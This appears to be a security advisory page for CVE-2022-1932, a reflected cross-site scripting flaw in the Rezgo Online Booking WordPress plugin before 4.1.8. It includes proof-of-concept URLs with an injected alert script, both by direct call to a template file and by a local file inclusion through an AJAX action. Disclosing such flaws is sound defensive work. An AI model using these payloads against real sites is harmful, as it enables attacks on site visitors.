Lucene search
CydaveWPVDB-ID:005C2300-F6BD-416E-97A6-D42284BBB093HistoryJul 26, 2022 - 12:00 a.m.
Rezgo Online Booking < 4.1.8 - Reflected Cross-Site-Scripting
2022-07-2600:00:00
cydave
wpscan.com
5
rezgo online booking
reflected cross-site-scripting
plugin vulnerability
sanitisation
ajax action
direct call
EPSS
0.001
Percentile
40.2%
The plugin does not sanitise and escape some parameters before outputting them back in a page, leading to a Reflected Cross-Site Scripting, which can be exploited either via a LFI in an AJAX action, or direct call to the affected file
PoC
Direct call: https://example.com/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags="><script>alert(`xss`)</script> Via the LFI: Once the plugin is configured (can use a dummy “Rezgo Company Code” and “Rezgo API Key” in the “Acccount Information” settings section): http://example.com/wp-admin/admin-ajax.php?action=rezgo&method;=rezgo/templates/default/frame_header&tags;="><script>alert(`xss`)</script>
Related
cve
cve
CVE-2022-1932
2022-08-22 15:15:13
prion
prion
Cross site scripting
2022-08-22 15:15:00
cvelist
cvelist
CVE-2022-1932 Rezgo Online Booking < 4.1.8 - Reflected Cross-Site-Scripting
2022-08-22 14:58:08
wpexploit
wpexploit
Rezgo Online Booking < 4.1.8 - Reflected Cross-Site-Scripting
2022-07-26 00:00:00
nvd
nvd
CVE-2022-1932
2022-08-22 15:15:13
patchstack
patchstack